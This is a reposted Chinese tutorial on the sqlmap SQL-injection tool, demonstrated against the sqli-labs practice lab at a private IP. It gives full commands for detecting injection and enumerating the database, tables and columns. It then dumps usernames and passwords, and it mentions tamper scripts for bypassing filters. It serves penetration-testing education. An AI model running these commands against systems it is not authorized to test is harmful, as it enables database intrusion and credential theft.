ICode9

精准搜索请尝试: 精确搜索
首页 > 数据库> 文章详细

sqlmap的使用

2019-08-06 19:56:07  阅读:299  来源: 互联网

标签:sqlmap 数据库 technique 192.168 sqlin 使用 注入


sqlmap----注入神器

sqlmap是一个开源的渗透测试工具,可以自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎,为终极渗透测试仪提供了许多利基功能,以及从数据库指纹识别,从数据库中获取数据到访问底层文件系统以及在操作系统上执行命令的各种交换机。

sqlmap支持的数据库:

  MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP MaxDB,Informix,HSQLDB和H2

sqlmap基本参数:

--update   更新升级
--dbms   指定数据库类型
--users   列举数据库用户
--dbs   列举数据库
--passwords   列举数据库用户密码
--reg-read   读取win系统注册表

 

这里以sqlin-labs-master演示sqlmap的使用方法:

 

检测是否可以注入:

  sqlmap.py -u http://192.168.81.128/sqlin/Less-2/?id=1

 

 

接下来开始注入,指定注入方法用报错注入,爆数据库名称:

 sqlmap.py -u http://192.168.81.128/sqlin/Less-2/?id=1 --technique E --current-db

 

 

爆数据表:

 sqlmap.py -u http://192.168.81.128/sqlin/Less-2/?id=1 --technique E -D security --tables

 

 

爆字段:

sqlmap.py -u http://192.168.81.128/sqlin/Less-2/?id=1 --technique E -D security -T users --columns

 

 

 报数据:

sqlmap.py -u http://192.168.81.128/sqlin/Less-2/?id=1 --technique E -D security -T users -C username,password --dump

 

 

 以上所用到的参数有:

--technique   指定注入方法
  B Boolean-based blind(布尔盲注)
  E Error-based(报错注入)
  U Union query-based(联合注入)
  T Time-based blind(时间注入)
--current-user   获取当前用户
--current-db   获取当前数据库名称
--tables   获取表名
--columns   获取列名
--dump   获取数据

最后说一个特别牛X的参数:--tamper      自带脚本绕过(也可以自己添加)

 

标签:sqlmap,数据库,technique,192.168,sqlin,使用,注入
来源: https://www.cnblogs.com/awrrays/p/11311355.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有